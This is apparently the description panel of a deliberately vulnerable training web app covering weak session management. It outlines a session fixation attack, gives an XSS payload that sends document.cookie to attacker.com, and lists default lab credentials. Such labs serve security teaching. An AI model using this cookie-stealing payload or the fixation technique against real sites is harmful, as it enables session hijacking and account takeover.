๐ฏ Vulnerability Info
Type: Weak Session Management
Severity: High
๐ก Vulnerabilities Present
- HttpOnly flag disabled (XSS can steal session)
- Secure flag disabled (works over HTTP)
- No session regeneration on login
- Predictable session IDs possible
- Session fixation possible
๐งช Session Fixation Attack
- Attacker creates fixed session ID
- Sends link with session:
?set_session=ATTACKER123
- Victim clicks and logs in
- Attacker uses same session ID to hijack
๐ง Test Links
๐ Steal Session via XSS
<script>
new Image().src="http://attacker.com/steal?c="+document.cookie;
</script>
๐ Credentials
- admin / admin123
- user / user123